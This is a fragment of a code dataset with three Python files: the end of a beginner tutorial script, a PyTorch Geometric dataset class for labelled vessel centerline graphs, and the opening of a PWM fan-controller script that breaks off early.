string\"\t\n\tprint(a_str,char, lines, unicode, raw_str)\n\t# Boolean literals: True | False\n\tprint(\"1 == True\", 1 == True)\n\tprint(\"0 == True\", 0 == True)\n\tprint(\"'' == True\", \"\" == True)\n\tprint(\"0.0 == True\", 0.0 == True)\n\tcount = 10\n\tis_valid_answer = False\n\tcount += is_valid_answer\n\tprint(count)\n\t# Special literals: None\n\tdrink = \"Coffee\"\n\tfood = None\n\tdef menu(x):\n\t\tif x == drink:\n\t\t\tprint(drink)\n\t\telse:\n\t\t\tprint(food)\n\tmenu(drink)\n\tmenu(food)\n\t# literals collections\n\tfruits = ['apple','mango','orange', 1, 2.0] # list\n\tnumbers = ('a', 2, 3.0) # tuple : freeze\n\tuser = {'first_name': 'Python', 'last_name': 'Fundamentals', 'description': 'Tutorial'} # dictionary\n\tvowels = {'a', 'e', 'i' , 'o', 'u'} #set : freeze\n\tfruits[0] = 'mango'\n\tprint(fruits)\n\tprint(numbers)\n\tk = 
'description'\t\n\tuser[k] += ' Headfirst'\n\tprint(user, user['first_name'], user['last_name'], user[k])\t\n\tprint(vowels)\n\t# numbers\n\ta = 5\n\tprint(a, \"is of type\", type(a))\n\n\ta = 2.0\n\tprint(a, \"is of type\", type(a))\n\n\ta = 1+2j\n\tprint(a, \"is complex number?\", isinstance(1+2j,complex))\n\n\ta = 123456789123456789123456789123456789123456789123456789 # memory limit\n\tb = 0.123456789123456789123456789123456789123456789123456789 # 15\n\tprint(a,b)\n\n\t# list\n\ta = [5,10,15,20,25,30,35,40]\n\tprint(a[0], a[5])\n\tprint(a[0:3])\n\tprint(a[4:])\n\tprint(a[:3])\n\tprint(a[:-2])\t\n\t# tuple\n\tb = (5, '2021', 'Jan', True)\n\tprint(b[0], b[0:2], a[0:-1])\n\t# string\n\tstr = \"pythondevelopers\"\n\tprint(str[0:5], str[:-1])\n\t# set\n\tuniqueValues = {1,1,1,2,3,4,5} # unorder list\n\tprint(uniqueValues)\n\t# dict\n\tobj = { 1: 'asda', 'name': 'something', 'value': 1.5e3, 'isValid': False}\n\tfor k in obj:\n\t\tprint(\"{} = {}\".format(k, obj[k]))\n\tprint(obj)\n\t# conversion\n\tn = \"25\"\n\tm = \"1\"\n\ttotal = int(n) + int(m)\n\tprint(total)\n\t# collections: list, tuple, set, dict\n\ta = tuple([1,2,3,1,2,3])\n\tprint(type(a), list(a), type([1,2,3]), set(a),list(set(a)))\n\tprint(dict([['first_name', 'Python'],['last_name','Tutorial']]))\n\t# output format\n\tx = 5; y = 10;\n\tprint('{} + {} = {}'.format(x, y, x + y))\n\ta = 'Python'; b = 'Tutorial';\n\tprint('{1} {0}'.format(b,a))\n\tfirst_name = 'Python'; last_name = 'Tutorial'\n\tprint('{first_name} {last_name}'.format(first_name=first_name, last_name=last_name))\n\tx = 123456.23456\n\tprint('x = %3.2f' %x)\n\timport math\n\tprint(math.pi)\n\timport sys\n\tprint(sys.path)\n\t# modulus, floor\n\tx = 5;\n\tfrom fractions import Fraction\n\tprint('{} % 2 = {}\\n {} // 2 = {}\\n {}^{} = {}\\n {}/{}={}'.format(x, x%2, x, x//2, 2,3, 2**3, 2,3,2/3))\n\tprint(Fraction(float(1/3)))\n\t# logical: and, or not\n\tif not False:\n\t\tprint('False')\n\telse:\n\t\tprint('True')\n\tfor x in range(1,100):\n\t\tif isPrime(x): print('{} '.format(x))\n\t# same memory check\n\tt = 5;\n\tz = t;\n\tv = 5;\n\tprint('Is {} and {} on the same memory? {}'.format(t,z, t is z))\n\tprint('Is {} and {} not on the same memory? {}'.format(t,v, t is not v))\n\tstr_a = \"hello\"\n\tstr_b = \"hello\"\n\tlist_a = [1,2,3]\n\tlist_b = [1,2,3]\n\tprint(str_a is str_b)\n\tprint(list_a is list_b)\n\tprint(tuple(list_a) is tuple(list_b))\n\t# Membership operators\n\tprint(\"{} is in {} ? {}\", 'e', str_a, 'e' in str_a)\n\tprint(\"{} is in {} ? {}\", '1', str_a, '1' not in str_a)\n\tprint(\"{} is in {} ? 
{}\", 1, list_a, 1 in list_a)\n\tprint(id(str_a), id(str_b), id(list_a), id(list_b), id(t), id(z), id(v))\n\tdef printHello():\n\t print(\"Hello\")\n\n\ta = printHello\n\ta()\n\t# Built-in namespace > Module: Global namespace > Function: Local namespace\n\ndef example_008():\n\t'''In this program, \n\twe check if the number is positive or\n\tnegative or zero and \n\tdisplay an appropriate message'''\n\n\tnum = 3.4\n\n\t# Try these two variations as well:\n\t# num = 0\n\t# num = -4.5\n\n\tif num > 0:\n\t print(\"Positive number\")\n\telif num == 0:\n\t print(\"Zero\")\n\telse:\n\t print(\"Negative number\")\n\n\tarr = [3, 5, 4, 1, 1, 1, 4, 5, 2, 2, 3]\n\tfor x in arr:\n\t\tprint(x)\n\ndef example_009():\n\tnumbers = range(1,11)\n\tsum = 0\n\tarea = 1\n\ta_str = \"\"\n\tb_str = \"\"\n\tfor i in range(len(numbers)):\n\t\tsum += numbers[i]\t\t\t\n\t\ta_str += str(numbers[i]) + (\" = \" if i == len(numbers) - 1 else \" + \")\n\tfor i in range(len(numbers)):\n\t\tarea *= numbers[i]\n\t\tb_str += str(numbers[i]) + ((\" * \",\" = \")[ i == len(numbers) - 1])\n\tprint(\"{}{}\".format(a_str, sum))\n\tprint(\"{}{}\".format(b_str, area))\n\t# program to display student's marks from record\n\tstudent_name = 'Soyuj'\n\n\tmarks = {'James': 90, 'Jules': 55, 'Arthur': 77} # dictionary\n\n\tfor student in marks:\n\t if student == student_name:\n\t print(marks[student])\n\t break\n\telse:\n\t print('No entry with that name found.')\t\n\n\tdigits = [0, 1, 5]\n\n\tfor i in digits:\n\t print(i)\n\telse:\n\t print(\"No items left.\")\n\n\tn = 10\n\n\t# initialize sum and counter\n\tsum = 0\n\ti = 1\n\n\twhile i <= n:\n\t sum = sum + i\n\t i = i+1 # update counter\n\n\t# print the sum\n\tprint(\"The sum is\", sum)\t \n\n\tfor val in \"string\":\n\t if val == \"i\":\n\t break\n\t print(val)\n\n\tprint(\"The end\")\n\n\tsequence = {'p', 'a', 's', 's'}\n\tfor val in sequence:\n\t pass\t\n\ndef example_010():\n\tdef greet(first_name, last_name, others=\"\"):\n\t\tprint(\"Hello {first_name} {last_name} {others}\".format(first_name=first_name, last_name=last_name, others=others))\n\tgreet(\"Python3\", \"Tutorial\")\n\tgreet(last_name = \"The tutorial\", first_name = \"Python3\")\n\tgreet(\"Python3\", others=\"test\", last_name = \"The tutorial\")\n\thello(\"PHP7\", \"Python3\", \"Golang\", \"Javascript\", \"Ruby\")\n\tnum = 10\n\tprint(\"{}! 
= {}\".format(num,factorial(num)))\n\t# lambda/ anonymous function\n\tdouble = lambda x: x * 2\n\tprint(\"double({}) = {}\".format(num, double(num)))\n\t# filter\n\tmy_list = [1, 5, 4, 6, 8, 11, 3, 12]\n\tnew_list = list(filter(lambda x: (x%2==0), my_list))\n\tprint(new_list)\n\t# map\n\tnew_l = list(map(lambda x: x*2, my_list))\n\tprint(new_l)\n\t# module\n\timport config;\n\timport loader;\n\tfrom math import pi, e\n\n\tprint(\"BASE_URL={}\\nENV={}\".format(config.BASE_URL, config.ENV))\n\tprint(pi, e)\n \ndef example_011():\n\t\"\"\"\n\tFile I/O:\n\t- Open a file\n\t- Read or write\n\t- Close the file\n\tNumbers:\n\t- Random number\n\t\"\"\"\t\n\timport re\n\ttry:\n\t\tdef splitLine(line):\n\t\t\ts = re.search(\"(This is line )(\\d*)\", line)\n\t\t\t\"\"\"\n\t\t\ts[0]:full\n\t\t\ts[1]:group1\n\t\t\ts[2]:group2\n\t\t\t\"\"\"\n\t\t\tif s:\n\t\t\t\treturn int(s[2])\n\t\t\treturn 0\n\t\t# mode: r : read, w: write, a:append, b:binary, t:text\n\t\t# open\n\t\tfile = './tmp/test.txt'\n\t\twith open(file, 'r+t') as f:\n\t\t\t# sum\n\t\t\tsum = 0\n\t\t\tlines = f.readlines()\t\t\n\t\t\tfor line in lines:\n\t\t\t\tsum += int(splitLine(line))\t\t\t\t\n\t\tf = open(file, 'a+t')\n\t\tf.write(\"SUM {}\\n\".format(sum))\n\t\tfor x in range(0,10):\n\t\t\tf.write(\"This is line {}\\n\".format(x + 1))\n\t\t# close\n\t\tf.close()\n\texcept Exception as e:\t\t\n\t\traise\n\tfinally:\n\t\tpass\n\ndef example_012():\n\timport random\n\tprint(random.randrange(10,20))\n\tx = ['red','green','blue','yellow','gray']\n\tprint(random.choice(x))\n\t# shuffle\n\trandom.shuffle(x)\n\tprint(x)\n\t# list\n\tnumbers = [1,2,3,4,5,6,7,8,9,10]\n\tprint(numbers[0:4], numbers[:-6])\n\tnumbers.append(11)\n\tprint(numbers[-1:])\n\tnumbers.extend([12,13,14,15])\n\tprint(numbers)\n\tdel_index = random.choice(range(0,len(numbers)))\n\tprint('del_index[{}] = {}'.format(del_index, numbers[del_index]))\n\tdel numbers[del_index]\n\tprint(numbers)\n\twhile numbers:\n\t\tnumbers.pop()\n\t\tprint(numbers[-1:])\n\ndef example_013():\n\tarr = [3, 5, 4, 1, 1, 4, 5, 2, 2, 3]\n\t# remove duplicate\t\n\tdef remove_duplicate_values(arr):\n\t\tnew_arr = []\n\t\tfor i in range(0,len(arr)):\t\t\t\n\t\t\tprint(\"{} - {}\".format(new_arr, arr[i:]))\n\t\t\tif len(new_arr) and new_arr[-1] == arr[i]:\n\t\t\t\tnew_arr.pop()\n\t\t\telse:\n\t\t\t\tnew_arr.append(arr[i])\n\t\treturn new_arr\n\tprint(remove_duplicate_values(arr))\n\n\t# animals list\n\tanimals = ['cat', 'dog', 'rabbit', 'guinea pig']\n\n\t# 'rabbit' is removed\n\tanimals.remove('rabbit')\n\n\t# Updated animals List\n\tprint('Updated animals list: ', animals)\n\ttry:\n\t\tif(animals.index('rabbit')):\n\t\t\tanimals.remove('rabbit')\t\t\t\t\n\t\tprint(animals)\n\texcept Exception as e:\n\t\tprint(e)\n\n\ts = ['I', 'want', 4, 'apples', 'and', 18, 'bananas'] \n\tstr1 = \"\"\n\tprint(str1.join([str(elem) for elem in s]))\n\ts = ' '.join(map(str, s))\n\tnumbers = [1,2,3,4]\n\n\tprint(s)\n\ndef hello(*names):\n\tfor name in names:\n\t\tprint(\"Hello\", name)\n\n\ndef factorial(x):\n\tif x == 1:\n\t\treturn x\n\treturn x * factorial(x - 1)\n\ndef isPrime(n):\n\tif n == 1 or n == 2: return True\n\tfor i in range(2,n-1):\n\t\tif( n % i == 0): return False\n\treturn True\n\ndef multiply(a, b):\n return a * b\n\ndef double(num):\n \"\"\"Function to double the value\"\"\"\n return 2*num \n\ndef print_hi(name):\n \"\"\"Function to say hello with name input\"\"\"\n print(f'Hi, {name}') \n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n 
print(multiply(1, 2))\n print(example_001())\n print(example_002())\n print(example_003())\n print(example_004())\n example_005()\n print(double.__doc__)\n print(print_hi.__doc__)\n example_006()\n example_007()\n example_008()\n example_009()\n example_010()\n example_011()\n example_012()\n example_013()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"misostack/python2021","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2383933579","text":"import os, json\n\nimport numpy as np\n\nimport torch\nfrom torch_geometric.data import InMemoryDataset, Data\n\nfrom sklearn.model_selection import train_test_split\n\nfrom extracranial_vessel_labelling.data.utils import load_pickle, node_transform\n\nclass EVCDataset(InMemoryDataset):\n \"\"\"\n Dataset class for the Extarcranial Vascular Centerline (EVC) dataset. The dataset is\n composed of centerline graphs generated from vascular segmentations from Full head-and-neck \n CTA images, from which the centerlines of the extracranial vessels were extracted. The original \n dataset contains centerline graphs from 561 cases. Nodes correspond to bifurcations, while edges\n correspond to vascular segments. The graphs contained manually labelled vessel types for each edge.\n However, we perform a node transform to the graphs, converting edges into nodes and maintaining connectivity \n by adding edges to all segments immediately in contact in all bifurcation points. This way, we convert \n the problem to a node classification task.\n\n All vessels are a type of either of these 14 classes: other, AA, BT, RCCA, LCCA, RSA, LSA, RVA, \n LVA, RICA, LICA, RECA, LECA, BA.\n\n The dataset description json file is mandatory for normalizaiton purposes. If it is not found, it will be\n created from the raw data. \n\n Parameters\n ----------\n root : str\n Path to the root folder of the dataset. We assume that raw_dir (`raw`) and processed_dir (`processed`) \n are subfolders of root.\n raw_file_names : list of str, optional\n List of raw file names, by default None. If None, all files in raw_dir are used.\n processed_file_names : list of str, optional\n List of processed file names, by default None. If None, all files in processed_dir are used.\n pre_transform : object, optional\n Pre-transform object, by default None. It should input a Data object and output a Data object.\n\n \"\"\"\n def __init__(self, root, raw_file_names_list = None, processed_file_names_list = None, pre_transform = None, transform = None):\n if os.path.exists(os.path.join(root, \"dataset.json\")):\n pass\n else:\n print(\"No dataset description file found. 
Creating dataset description file from raw dir data.\")\n generate_EVC_dataset_json(root)\n with open(os.path.join(root, \"dataset.json\"), \"r\") as f:\n self.dataset_description = json.load(f)\n self.raw_file_names_list = raw_file_names_list\n self.processed_file_names_list = processed_file_names_list\n\n super(EVCDataset, self).__init__(root=root, pre_transform=pre_transform, transform=transform)\n self.process()\n\n @property\n def raw_file_names(self):\n if self.raw_file_names_list is not None:\n return self.raw_file_names_list\n else:\n return [f for f in sorted(os.listdir(self.raw_dir)) if f.endswith(\".pickle\")]\n\n @property\n def processed_file_names(self):\n if self.processed_file_names_list is not None:\n return self.processed_file_names_list\n else:\n return [f for f in sorted(os.listdir(self.processed_dir)) if f.endswith(\".pt\")]\n\n def process(self): \n # Here you would read your raw files, create Data objects, and apply any pre-transforms\n data_list = []\n for raw_file in self.raw_file_names:\n graph_nx = node_transform(load_pickle(os.path.join(self.raw_dir, raw_file)))\n # Pytorch data object\n data = Data()\n x, edge_index, y, pos = [], [], [], []\n for node in graph_nx.nodes:\n pos.append(graph_nx.nodes[node][\"pos\"])\n x.append(graph_nx.nodes[node][\"features\"])\n y.append(graph_nx.nodes[node][\"vessel_type\"])\n for n0, n1 in graph_nx.edges:\n edge_index.append(np.array([n0, n1]))\n data.pos = torch.tensor(np.array(pos), dtype=torch.float32)\n data.x = self.normalize_edge_features(torch.tensor(np.array(x), dtype=torch.float32))\n data.edge_index = torch.transpose(torch.tensor(np.array(edge_index), dtype=torch.int64), 1, 0)\n data.y = torch.tensor(np.array(y), dtype=torch.int64)\n data.num_nodes = len(graph_nx.nodes)\n data.num_edges = len(graph_nx.edges)\n data.raw_file_path = raw_file\n data.processed_file_path = os.path.join(self.processed_dir, \"{}.pt\".format(raw_file.split(\".\")[0]))\n if self.pre_transform is not None:\n data = self.pre_transform(data)\n data_list.append(data)\n torch.save(data, data.processed_file_path)\n \n self.data_list = data_list\n\n def get_splits(self, train_files=None, test_files=None, train_idx=None, test_idx=None, test_size=0.2, random_state=42):\n \"\"\"\n Creates train and test splits from the dataset.\n\n Use cases:\n 1. Provide train_files and test_files: train and test splits are created from the provided file lists.\n Example: \n train_files = [\"file1.pickle\", \"file2.pickle\", \"file3.pickle\"]\n test_files = [\"file4.pickle\", \"file5.pickle\", \"file6.pickle\"]\n train_dataset, test_dataset = dataset.get_splits(train_files=train_files, test_files=test_files)\n 2. Provide train_idx and test_idx: train and test splits are created from the provided indices.\n Example:\n train_idx = [0, 1, 2]\n test_idx = [3, 4, 5]\n train_dataset, test_dataset = dataset.get_splits(train_idx=train_idx, test_idx=test_idx)\n 3. Provide only test_size: train and test splits are created randomly with the provided test_size. 
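No stratification is applied; the split is uniformly random over file indices. 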
Random state can be provided.\n            Example:\n                test_size = 0.2\n                train_dataset, test_dataset = dataset.get_splits(test_size=test_size)\n\n        Parameters\n        ----------\n        train_files : list of str, optional\n            List of train files, by default None\n        test_files : list of str, optional\n            List of test files, by default None\n        train_idx : list of int, optional\n            List of train indices, by default None\n        test_idx : list of int, optional\n            List of test indices, by default None\n        test_size : float, optional\n            Test size, by default 0.2\n        random_state : int, optional\n            Random state, by default 42\n\n        Returns\n        -------\n        train_dataset : torch_geometric.data.InMemoryDataset\n            Train dataset\n        test_dataset : torch_geometric.data.InMemoryDataset\n            Test dataset\n        \"\"\"\n        if train_files is not None and test_files is not None:\n            if train_files[0].endswith(\".pickle\") and train_files[0] in self.raw_file_names:\n                train_idx = [self.raw_file_names.index(file) for file in train_files]\n                test_idx = [self.raw_file_names.index(file) for file in test_files]\n            elif train_files[0].endswith(\".pt\") and train_files[0] in self.processed_file_names:\n                train_idx = [self.processed_file_names.index(file) for file in train_files]\n                test_idx = [self.processed_file_names.index(file) for file in test_files]\n            else:\n                print(\"Provided file lists are not valid, defaulting to random split (test_size = {:.2f}).\".format(test_size))\n                # actually fall back to the random split; leaving train_idx/test_idx as None would crash below\n                indices = list(range(len(self.raw_file_names)))\n                train_idx, test_idx = train_test_split(indices, test_size=test_size, train_size=1 - test_size, random_state=random_state)\n        elif train_idx is not None and test_idx is not None:\n            pass # Use the provided indices directly\n        else:\n            indices = list(range(len(self.raw_file_names)))\n            train_idx, test_idx = train_test_split(indices, test_size=test_size, train_size = 1 - test_size, random_state=random_state)\n        \n        # Get the file names for the train and test splits\n        train_files = [self.raw_file_names[i] for i in train_idx]\n        test_files = [self.raw_file_names[i] for i in test_idx]\n\n        # Create new dataset instances for the train and test splits\n        train_dataset = EVCDataset(self.root, raw_file_names_list=train_files, pre_transform=self.pre_transform)\n        test_dataset = EVCDataset(self.root, raw_file_names_list=test_files, pre_transform=self.pre_transform)\n\n        return train_dataset, test_dataset\n\n    def normalize_edge_features(self, edge_features):\n        def z_score_normalization(edge_features, mean, std):\n            return (edge_features - mean) / std\n        def min_max_normalization(edge_features, min, max):\n            return (edge_features - min) / (max - min)\n        def mean_centering_normalization(edge_features, mean):\n            return edge_features - mean\n        def ensure_normalized_vectors(edge_features):\n            return edge_features / torch.norm(edge_features, dim=1, keepdim=True)\n        \n        if self.dataset_description is None:\n            print(\"No dataset description file found. 
This will be an issue for normalization of edge features.\")\n return edge_features\n else:\n # Compute min max values after mean centering for landmark positions normalization\n mean_position = self.dataset_description[\"mean_edge_features\"][21:24]\n min_edge_features_mc = self.dataset_description[\"min_edge_features\"].copy()\n max_edge_features_mc = self.dataset_description[\"max_edge_features\"].copy()\n # Mean centering for r coordinates\n for idx in [15, 18, 21]:\n min_edge_features_mc[idx] -= mean_position[0]\n max_edge_features_mc[idx] -= mean_position[0]\n # Mean centering for a coordinates\n for idx in [16, 19, 22]:\n min_edge_features_mc[idx] -= mean_position[1]\n max_edge_features_mc[idx] -= mean_position[1]\n # Mean centering for s coordinates\n for idx in [17, 20, 23]:\n min_edge_features_mc[idx] -= mean_position[2]\n max_edge_features_mc[idx] -= mean_position[2]\n for idx, feature_name in enumerate(self.dataset_description[\"edge_feature_names\"]):\n # For distance or continuous features, we apply z-score normalization\n if feature_name in [\"mean radius\", \"proximal radius\", \"distal radius\", \"proximal/distal radius ratio\", \"minimum radius\", \"maximum radius\", \"distance\", \"relative length\"]:\n edge_features[:, idx] = z_score_normalization(edge_features[:, idx], self.dataset_description[\"mean_edge_features\"][idx], self.dataset_description[\"std_edge_features\"][idx])\n # For number of points, we apply min-max normalization\n elif feature_name in [\"number of points\"]:\n edge_features[:, idx] = min_max_normalization(edge_features[:, idx], self.dataset_description[\"min_edge_features\"][idx], self.dataset_description[\"max_edge_features\"][idx])\n # For positional features, we apply mean centering normalization followed by min-max normalization\n elif feature_name in [\"proximal bifurcation position r\", \"proximal bifurcation position a\", \"proximal bifurcation position s\", \n \"distal bifurcation position r\", \"distal bifurcation position a\", \"distal bifurcation position s\", \n \"pos r\", \"pos a\", \"pos s\"]:\n edge_features[:, idx] = mean_centering_normalization(edge_features[:, idx], self.dataset_description[\"mean_edge_features\"][idx])\n edge_features[:, idx] = min_max_normalization(edge_features[:, idx], min_edge_features_mc[idx], max_edge_features_mc[idx])\n # For direction and departure angle, we ensure normalized vectors\n edge_features[:, 8:11] = ensure_normalized_vectors(edge_features[:, 8:11]) # Direction\n edge_features[:, 11:14] = ensure_normalized_vectors(edge_features[:, 11:14]) # Departure angle\n\n return edge_features\n \n def __len__(self) -> int:\n return len(self.data_list)\n \n def __getitem__(self, idx):\n data = self.data_list[idx]\n if self.transform is not None:\n data = self.transform(data)\n \n return data\n \ndef generate_EVC_dataset_json(\n root, \n dataset_name = \"Extracranial vascular centerlines\",\n name_node_features = None,\n name_edge_features = \"features\",\n name_graph_features = None,\n name_graph_label = None,\n name_node_label = None,\n name_edge_label = \"vessel_type\",\n graph_labels_dict = None,\n node_labels_dict = None,\n edge_labels_dict = dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n ):\n \"\"\"\n Generates a json file with the dataset information. 
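The file aggregates example/node/edge counts, class frequencies, and per-feature statistics that EVCDataset later uses to normalize edge features. 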
Saves the file in the root folder:\n\n >>> os.path.join(os.path.join(root, \"dataset.json\"))\n\n Parameters\n ----------\n root : str\n Path to the root folder of the dataset.\n dataset_name : str, optional\n Name of the dataset, by default \"Extracranial vascular centerlines\"\n name_node_features : str, optional\n Name of the node features, by default None\n name_edge_features : str, optional\n Name of the edge features, by default \"features\"\n name_graph_features : str, optional\n Name of the graph features, by default None\n name_graph_label : str, optional\n Name of the graph label, by default None\n name_node_label : str, optional\n Name of the node label, by default None\n name_edge_label : str, optional\n Name of the edge label, by default \"vessel_type\"\n graph_labels_dict : dict, optional\n Dictionary with the graph labels, by default None\n node_labels_dict : dict, optional \n Dictionary with the node labels, by default None\n edge_labels_dict : dict, optional\n Dictionary with the edge labels, by default \n dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n \"\"\"\n # Define raw_dir\n raw_dir = os.path.join(root, \"raw\")\n # Read filenames\n filenames = sorted([f for f in os.listdir(raw_dir) if f.endswith(\".pickle\")])\n # Load the data\n raw_data_list = [load_pickle(os.path.join(raw_dir, f)) for f in filenames]\n\n # Some data are just hardcoded\n # dataset_name = \"Extracranial vascular centerlines\"\n # name_graph_features = None\n # name_node_features = None\n # name_edge_features = \"features\"\n # name_graph_label = None\n # name_node_label = None\n # name_edge_label = \"vessel_type\"\n # graph_labels_dict = None\n # node_labels_dict = None\n # edge_labels_dict = dict(zip([idx for idx in range(14)], [\"other\", \"AA\", \"BT\", \"RCCA\", \"LCCA\", \"RSA\", \"LSA\", \"RVA\", \"LVA\", \"RICA\", \"LICA\", \"RECA\", \"LECA\", \"BA\"]))\n num_graph_classes = None\n num_node_classes = None\n num_edge_classes = len(edge_labels_dict)\n total_number_of_examples = len(raw_data_list)\n\n # Others are derived from a single example\n example = raw_data_list[0]\n if name_graph_features is None:\n num_graph_features = 0\n graph_feature_names = None\n else:\n num_graph_features = len(example.graph[name_graph_features])\n if name_graph_features + \"_dict\" in example.graph:\n graph_feature_names = list(example.graph[name_graph_features + \"_dict\"].keys())\n else:\n graph_feature_names = None\n if name_node_features is None:\n num_node_features = 0\n node_feature_names = None\n else:\n num_node_features = len(example.nodes[0][name_node_features])\n if name_node_features + \"_dict\" in example.nodes[0]:\n node_feature_names = list(example.nodes[0][name_node_features + \"_dict\"].keys())\n else:\n node_feature_names = None\n if name_edge_features is None:\n num_edge_features = 0\n edge_feature_names = None\n else:\n num_edge_features = len(example[0][1][name_edge_features])\n if name_edge_features + \"_dict\" in example[0][1]:\n edge_feature_names = list(example[0][1][name_edge_features + \"_dict\"].keys())\n else:\n edge_feature_names = None\n\n # For the rest, we have to iterate over the dataset\n total_number_of_nodes = 0\n total_number_of_edges = 0\n\n graph_featues_array = np.zeros((num_graph_features, 0))\n node_featues_array = np.zeros((num_node_features, 0))\n edge_featues_array = np.zeros((num_edge_features, 0))\n\n for example in raw_data_list:\n 
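# single pass over all graphs: accumulate global counts and stack raw feature columns (arrays grow along axis 1)\n        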
total_number_of_nodes += len(example.nodes)\n        total_number_of_edges += len(example.edges)\n        if name_graph_features is not None:\n            graph_featues_array = np.concatenate((graph_featues_array, np.expand_dims(example.graph[name_graph_features], axis = 1)), axis=1)\n        if name_node_features is not None:\n            for node in example.nodes:\n                node_featues_array = np.concatenate((node_featues_array, np.expand_dims(example.nodes[node][name_node_features], axis = 1)), axis=1)\n        if name_edge_features is not None:\n            for src, dst in example.edges:\n                edge_featues_array = np.concatenate((edge_featues_array, np.expand_dims(example[src][dst][name_edge_features], axis = 1)), axis=1)\n\n    average_number_of_nodes = total_number_of_nodes / total_number_of_examples\n    average_number_of_edges = total_number_of_edges / total_number_of_examples\n\n    # We can also compute class frequencies for loss weighting\n    if name_graph_label is not None:\n        graph_class_frequencies = np.zeros(num_graph_classes)\n        for example in raw_data_list:\n            # graph-level labels live on the graph itself, not on edges\n            graph_class_frequencies[example.graph[name_graph_label]] += 1\n\n        graph_class_frequencies /= np.sum(graph_class_frequencies)\n    else:\n        graph_class_frequencies = np.zeros(0)\n    # For nodes\n    if name_node_label is not None:\n        node_class_frequencies = np.zeros(num_node_classes)\n        for example in raw_data_list:\n            for node in example.nodes:\n                node_class_frequencies[example.nodes[node][name_node_label]] += 1\n        node_class_frequencies /= np.sum(node_class_frequencies)\n    else:\n        node_class_frequencies = np.zeros(0)\n    # For edges\n    if name_edge_label is not None:\n        edge_class_frequencies = np.zeros(num_edge_classes)\n        for example in raw_data_list:\n            for src, dst in example.edges:\n                edge_class_frequencies[example[src][dst][name_edge_label]] += 1\n        edge_class_frequencies /= np.sum(edge_class_frequencies)\n    else:\n        edge_class_frequencies = np.zeros(0)\n\n    # Now, just create the json file\n    dataset_dict = {\n        \"dataset_name\": dataset_name,\n        \"total_number_of_examples\": total_number_of_examples,\n        \"total_number_of_nodes\": total_number_of_nodes,\n        \"total_number_of_edges\": total_number_of_edges,\n        \"average_number_of_nodes\": average_number_of_nodes,\n        \"average_number_of_edges\": average_number_of_edges,\n        \"name_graph_features\": name_graph_features,\n        \"name_node_features\": name_node_features,\n        \"name_edge_features\": name_edge_features,\n        \"num_graph_features\": num_graph_features,\n        \"num_node_features\": num_node_features,\n        \"num_edge_features\": num_edge_features,\n        \"graph_feature_names\": graph_feature_names,\n        \"node_feature_names\": node_feature_names,\n        \"edge_feature_names\": edge_feature_names,\n        \"name_graph_label\": name_graph_label,\n        \"name_node_label\": name_node_label,\n        \"name_edge_label\": name_edge_label,\n        \"graph_labels_dict\": graph_labels_dict,\n        \"node_labels_dict\": node_labels_dict,\n        \"edge_labels_dict\": edge_labels_dict,\n        \"num_graph_classes\": num_graph_classes,\n        \"num_node_classes\": num_node_classes,\n        \"num_edge_classes\": num_edge_classes,\n        \"graph_class_frequencies\": graph_class_frequencies.tolist() if len(graph_class_frequencies) > 0 else None,\n        \"node_class_frequencies\": node_class_frequencies.tolist() if len(node_class_frequencies) > 0 else None,\n        \"edge_class_frequencies\": edge_class_frequencies.tolist() if len(edge_class_frequencies) > 0 else None,\n        \"mean_graph_features\": np.mean(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n        \"median_graph_features\": np.median(graph_featues_array, 
axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"std_graph_features\": np.std(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"min_graph_features\": np.min(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"max_graph_features\": np.max(graph_featues_array, axis=1).tolist() if len(graph_featues_array) > 0 else None,\n \"mean_node_features\": np.mean(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"median_node_features\": np.median(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"std_node_features\": np.std(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"min_node_features\": np.min(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"max_node_features\": np.max(node_featues_array, axis=1).tolist() if len(node_featues_array) > 0 else None,\n \"mean_edge_features\": np.mean(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"median_edge_features\": np.median(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"std_edge_features\": np.std(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"min_edge_features\": np.min(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None,\n \"max_edge_features\": np.max(edge_featues_array, axis=1).tolist() if len(edge_featues_array) > 0 else None\n }\n\n # Save the json file\n with open(os.path.join(root, \"dataset.json\"), \"w\") as f:\n json.dump(dataset_dict, f, indent=4)","repo_name":"perecanals/EVC","sub_path":"extracranial_vessel_labelling/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":22317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5257725066","text":"#!/usr/bin/env python3\nfrom simple_pid import PID\nimport time, glob, yaml, subprocess\n\nclass PwmFan:\n def __init__(self, name, devPath, minPwm, maxPwm, press_srcs):\n assert minPwm < maxPwm\n assert minPwm >= 0 and minPwm <= 255\n assert maxPwm >= 0 and maxPwm <= 255\n self.name = name\n self.devPath = devPath\n self.minPwm = minPwm\n self.maxPwm = maxPwm\n self.range = self.maxPwm - self.minPwm\n self.press_srcs = press_srcs\n\n def set_speed(self, percentage, dry_run=False):\n \"\"\"\n set fan speed, 0-100%. 
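Note that the percentage argument itself is passed as a 0.0-1.0 fraction, as the assert below enforces. 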
